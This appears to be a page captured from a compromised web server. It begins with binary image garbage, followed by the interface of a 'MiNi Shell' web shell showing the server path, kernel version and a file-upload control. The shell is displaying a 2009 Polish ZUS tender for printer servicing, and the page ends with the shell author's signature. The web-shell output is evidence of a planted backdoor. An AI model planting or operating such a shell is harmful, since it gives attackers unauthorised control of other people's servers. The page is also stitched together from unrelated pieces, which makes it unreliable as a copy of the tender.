JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090121/24331-N-2009.html

<p class="kh_header"><b>Warszawa: Obsługa serwisowa urządzeń poligraficznych w obiektach II Oddziału ZUS w Warszawie</b><br>
<b>Numer ogłoszenia: 24331 - 2009; data zamieszczenia: 21.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych II Oddział w Warszawie , ul. Podskarbińska 25, 03-829 Warszawa, woj. mazowieckie, tel. 022 5902322, 5902321, faks 022 5902730, 5902600.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ubezpieczenia społeczne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa serwisowa urządzeń poligraficznych w obiektach II Oddziału ZUS w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompletna obsługa serwisowa urządzeń poligraficznych w obiektach II oddziału ZUS Zamówienie będzie realizowane w podziale na zadania 1, 2, Na każde z zadań zostanie podpisana oddzielna umowa.  I. Opis do Zadań 1 i 2; Zadanie 1 :  urządzenia poligraficzne Samsung SCX4200 Wykaz urządzeń Samsung SCX4200 Zakup w grudniu 2006 1.Lokalizacja - II Oddział ZUS w Warszawie, ul. Podskarbińska 25, numer fabryczny 8T21BAKL927410V, stan licznika na dzień 31.08.2008 -87021, orientacyjna ilość kopii w 2008 r/mc - 4600; 2.Lokalizacja - II Oddział ZUS w Warszawie, ul. Podskarbińska 25, numer fabryczny 8T21BAKL927096F, stan licznika na dzień 31.08.2008 - 14905, orientacyjna ilość kopii w 2008 r/mc- 800; 3.Lokalizacja - II Oddział ZUS w Warszawie, ul. Podskarbińska 25, numer fabryczny 8T21BAKL939928V, stan licznika na dzień 31.08.2008 - 20436, orientacyjna ilość kopii w 2008 r/mc - 1100; 4.Lokalizacja - II Oddział ZUS w Warszawie, ul. Podskarbińska 25, numer fabryczny 8T21BAKL927387P, stan licznika na dzień 31.08.2008 - 5812, orientacyjna ilość kopii w 2008 r/mc - 300; 5.Lokalizacja - Inspektorat ZUS Praga Płn. Warszawa, ul. 11-go Listopada 15a, numer fabryczny 8T21BAKL927410V, stan licznika na dzień 31.08.2008 - 42558, orientacyjna ilość kopii w 2008 r/mc - 2300; 6.Lokalizacja - Inspektorat ZUS Praga Płn. Warszawa, ul. 11-go Listopada 15a, numer fabryczny 8T21BAKL927410V, stan licznika na dzień 31.08.2008 -31482, orientacyjna ilość kopii w 2008 r/mc - 1700. Umowa na serwisowanie urządzeń poligraficznych Samsung SCX4200 obowiązywać będzie od daty jej podpisania do dnia 31.12.2012 r.Zadanie 2 : urządzenia poligraficzne Brother DCP 7010 Wykaz urządzeń BROTHER DCP-7010 1.Lokalizacja - II Oddział ZUS w Warszawie, ul. Podskarbińska 25, numer fabryczny E63260H5J601441, data zakupu - 12.2005, stan licznika na dzień 31.08.2008 - 10543, orientacyjna ilość kopii w 2008 r/mc - 350; 2.Lokalizacja - II Oddział ZUS w Warszawie, ul. Podskarbińska 25, numer fabryczny E63260B6J943308, data zakupu - 04.2006, stan licznika na dzień 31.08.2008 - 23981, orientacyjna ilość kopii w 2008 r/mc - 900; 3.Lokalizacja Inspektorat ZUS Praga Pn. Warszawa, ul. 11-go Listopada 15a, numer fabryczny E63260B6J943403, data zakupu 04.2006, stan licznika na dzień 31.08.2008 - 37809, orientacyjna ilość kopii w 2008 r/mc - 1400; 4.Lokalizacja Inspektorat ZUS Legionowo, ul. Piłsudskiego 43b, numer fabryczny E63260J5J681534, data zakupu 12.2005, stan licznika na dzień 31.08.2008 - 26705, orientacyjna ilość kopii w 2008 r/mc - 900; 5.Lokalizacja Inspektorat ZUS Legionowo, ul. Słowackiego 20, numer fabryczny E63260B6J943351, data zakupu 04.2006, stan licznika na dzień 31.08.2008 - 28971, orientacyjna ilość kopii w 2008 r/mc - 1000; 6.Lokalizacja - Inspektorat ZUS Otwock, ul. Poniatowskiego 17, numer fabryczny E63260A6J646233, data zakupu 04.2006, stan licznika na dzień 31.08.2008 - 55522, orientacyjna ilość kopii w 2008 r/mc - 2100; 7.Lokalizacja - Inspektorat ZUS Wołomin, ul. Reja 20, numer fabryczny E63260B6J943329, data zakupu 04.2006, stan licznika na dzień 31.08.2008 - 43795, orientacyjna ilość kopii w 2008 r/mc - 1700; 8.Lokalizacja - Inspektorat ZUS Nowy Dwór Mazowiecki, ul. Modlińska 10, numer fabryczny E63260B6J943409, data zakupu 04.2006, stan licznika na dzień 31.08.2008 - 19915, orientacyjna ilość kopii w 2008 r/mc - 750. Umowa na serwisowanie urządzeń poligraficznych Brother DCP 7010 obowiązywać będzie od daty jej podpisania do dnia 31.12.2012 r. Warunki realizacji zamówienia wspólne dla zadań 1 i 2. 1. W ramach usługi serwisowania urządzeń przewiduje się: a. Wykonywanie z częstotliwością 1 raz na kwartał czynności konserwacyjnych b. Na wezwanie Zamawiającego usuwanie wszelkich niesprawności urządzenia. c. Wykonywanie napraw z utylizacją zużytych części. d. Wykonywanie ekspertyz stanu technicznego urządzeń. 2. Wszystkie usługi serwisowe będą wykonywane w miejscu lokalizacji urządzenia. Na uzasadniony wniosek Wykonawcy Zamawiający dopuszcza wykonanie usługi w innym miejscu - w takim przypadku wydanie urządzenia następuje na podstawie przepustki. 3. Lokalizację urządzeń podano w Wykazach urządzeń do zadań. Lokalizacja urządzeń może ulegać zmianie w trakcie trwania umowy. Przy szacowaniu ceny konserwacji i roboczogodziny serwisowej należy uwzględniać konieczność ewentualnego dojazdu do wymienionych poniżej lokalizacji: Warszawa ul. Podskarbińska 25, Warszawa ul. 11 Listopada 15a, Legionowo ul. Słowackiego 20, Legionowo ul. Piłsudskiego 43b, Wołomin ul. Reja 20, Wołomin ul. Mieszka I nr 9, Otwock ul. Poniatowskiego 17, Nowy Dwór Mazowiecki ul. Modlińska 10, Warszawa ul. Czerniakowska 16. Ze swojej strony Zamawiający zobowiązuje się informować o ewentualnym przemieszczeniu urządzeń z wyprzedzeniem 1 tygodniowym. 4. Wykonywanie czynności konserwacyjnych odbywać się będzie w zakresie zgodnym z zaleceniami producenta urządzenia . 5. Pierwsza konserwacja nastąpi w miesiącu podpisania umowy, kolejne konserwacje w pierwszym miesiącu kwartału bez wezwania przez Zamawiającego. 6. Czynności serwisowe będą każdorazowo potwierdzane w formie pisemnej w postaci protokołu. 7. Wszelkie czynności z wyjątkiem konserwacji, Wykonawca podejmuje w ciągu 24 h od momentu otrzymania zgłoszenia od Zamawiającego (faksem lub e-mailem). 8. W przypadku usuwania niesprawności urządzenia, które trwać będą krócej niż 3 godziny serwisowe (bez wymiany części ) Wykonawca może realizować usługę tylko na podstawie zgłoszenia. W innym przypadku składa kalkulację cenową Zamawiającemu. Wykonawca przystępuje do realizacji usługi dopiero po akceptacji przez Zamawiającego kosztów przedstawionych w kalkulacji cenowej i otrzymaniu zlecenia. 9. Ustala się czas zakończenia naprawy i usunięcia niesprawności na 3 dni robocze od momentu otrzymania zlecenia lub w uzasadnionych przypadkach w terminie obustronnie uzgodnionym. 10. W przypadku przedłużenia się naprawy powyżej 14 dni roboczych Wykonawca na żądanie Zamawiającego nieodpłatnie udostępni na okres trwania naprawy urządzenie zastępcze o tych samych lub zbliżonych parametrach. 11. W przypadku konieczności wykonania naprawy poza siedzibą Zamawiającego lub w przypadku dostarczenia urządzenia zastępczego Wykonawca dokona transportu urządzenia na własny koszt. 12. Wykonawca do wykonywania usługi będzie używał materiałów i części zalecanych przez producenta urządzenia. W przypadku stosowania zamienników wymagane jest posiadanie (przedstawienie) certyfikatu jakości wydanego przez Producenta lub Dystrybutora odpowiednio dla danego typu urządzeń. 13. Poniżej wymienione materiały eksploatacyjne Zamawiający zapewnia i wymienia we własnym zakresie: a) toner dla Zadania 1, b) toner i bęben dla Zadania 2. 14. Na wykonane czynności serwisowe (z wyjątkiem konserwacji) Wykonawca udziela min. 6 miesięcznej gwarancji na wykonaną usługę (robociznę) oraz min. 6 miesięcznej gwarancji na części zamienne, chyba że gwarancji na daną część udzieli producent urządzenia to w takim przypadku Wykonawca dostarczy Zamawiającemu dokumenty uprawniające do realizacji gwarancji. 15. Do oferty Wykonawca załączy cennik wykonywania typowych napraw dla których określi ceny części zamiennych oraz czas naprawy. Cennik będzie obowiązywał przez cały okres trwania umowy (bez pozycji wymiany tonera i bębna).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.31.30.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> § 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień  

2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

Doświadczenie zawodowe przedstawiające się wykonaniem lub  wykonywaniem  usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (okres świadczenia usługi min. 12 miesięcy), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia: 
1) dla Zadania 1 - Zamawiający wymaga wykazania min. dwóch wykonanych zamówień dot. wykonywania obsługi serwisowej urządzeń poligraficznych Samsung. Okres świadczenia usługi min. 12 kolejnych miesięcy. 
2) dla Zadania 2 - Zamawiający wymaga wykazania min. dwóch wykonanych zamówień dot. wykonywania obsługi serwisowej urządzeń poligraficznych BROTHER. Okres świadczenia usługi min. 12 kolejnych miesięcy. 

3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia

4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

§ 2. Ocena spełniania ww. warunków nastąpi na podstawie weryfikacji dokumentów dołączonych do oferty na zasadzie spełnia lub nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> § 1. Wykonawcy biorący udział w postępowaniu muszą złożyć oświadczenie
potwierdzające spełnienie wymagań określonych w art. 22 ust. 1 pkt. 1- 4 ustawy Prawo  zamówień  publicznych.

§ 2. Wykonawcy biorący udział w postępowaniu  muszą dostarczyć w celu potwierdzenia  spełnienia  warunków udziału w postępowaniu następujące dokumenty:

1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych Wykonawca musi złożyć:

a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert

2.  W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnego doświadczenia Wykonawca musi złożyć:
wykaz usług -  wykonanych lub wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (okres świadczenia usługi min. 12 miesięcy), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia tj. 
1)  dla Zadania 1 - Zamawiający wymaga wykazania min. dwóch wykonanych zamówień dot. wykonywania obsługi serwisowej urządzeń poligraficznych Samsung. Okres świadczenia usługi min. 12 kolejnych miesięcy. 
2) dla Zadania 2 - Zamawiający wymaga wykazania min. dwóch wykonanych zamówień dot. wykonywania obsługi serwisowej urządzeń poligraficznych BROTHER. Okres świadczenia usługi min. 12 kolejnych miesięcy. 
Do wykazu Wykonawca musi dołączyć dokumenty potwierdzające, że usługi zostały wykonane należycie Dokumenty muszą być wystawione przez zamawiającego/odbiorcę usług.

§ 3. 1 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w § 2 ust. 1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.

2. Dokument, o którym mowa w ust. 1,  powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. l, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapis ust. 2 stosuje się odpowiednio.

§ 4.  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika  do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
W tym przypadku Wykonawcy występujący wspólnie (dot. również spółek cywilnych) muszą  złożyć:
- pełnomocnictwo do reprezentacji podmiotów występujących wspólnie 
- każdy z uczestników wchodzący w skład podmiotu wspólnie ubiegającego się o udzielenie zamówienia musi załączyć dokumenty wymienione w § 1 i § 2 ust. 1 . 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w § 1 : w zakresie spełniania warunków określonych w art.22 ust. 1 pkt. 1 i 4 - składa każdy odrębnie, natomiast w zakresie określonym w art. 22 ust.1 pkt. 2 i 3 - wszyscy łącznie.

Wszystkie dokumenty Wykonawców mogących wspólnie ubiegać się o udzielenie zamówienia muszą wchodzić w skład danej oferty i być złożone łącznie.
Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana, taki Wykonawca będzie zobowiązany przed zawarciem umowy w sprawie zamówienia publicznego do złożenia Zamawiającemu umowy regulującej współpracę tych wykonawców. 

§ 5. Oferta musi zawierać następujące dokumenty i oświadczenia:
a) wypełniony Formularz ofertowy 
b) dokumenty i oświadczenia wymienione w § 1 - §  4 niniejszego artykułu (stosownie dla poszczególnych Wykonawców)
c) cennik typowych napraw z podaniem ceny części zamiennych i czasu naprawy (w godzinach) obowiązujący przez cały okres trwania umowy- dotyczy Zadania  1 i 2. Oddzielny cennik dla każdego zadania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych
II  Oddział  w  Warszawie,
Wieloosobowe Stanowisko ds. Zamówień Publicznych,
ul. Podskarbińska 25, pok.321,
03-829 Warszawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2009 godzina 10:00, miejsce: Zakład Ubezpieczeń Społecznych
II  Oddział  w  Warszawie,
Wieloosobowe Stanowisko ds. Zamówień Publicznych,
ul. Podskarbińska 25, pok.321,
03-829 Warszawa.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> obsługa serwisowa urządzeń poligraficznych Samsung SCX4200.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa serwisowa urządzeń poligraficznych Samsung SCX4200 zgodnie z opisem przedmiotu zamówienia - sekcja II.1.3 ogłoszenia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.30.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> obsługa serwisowa urządzeń poligraficznych Brother DCP7010.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa serwisowa urządzeń poligraficznych Brother DCP7010 zgodnie z opisem przedmiotu zamówienia - sekcja II.1.3 ogłoszenia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.30.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com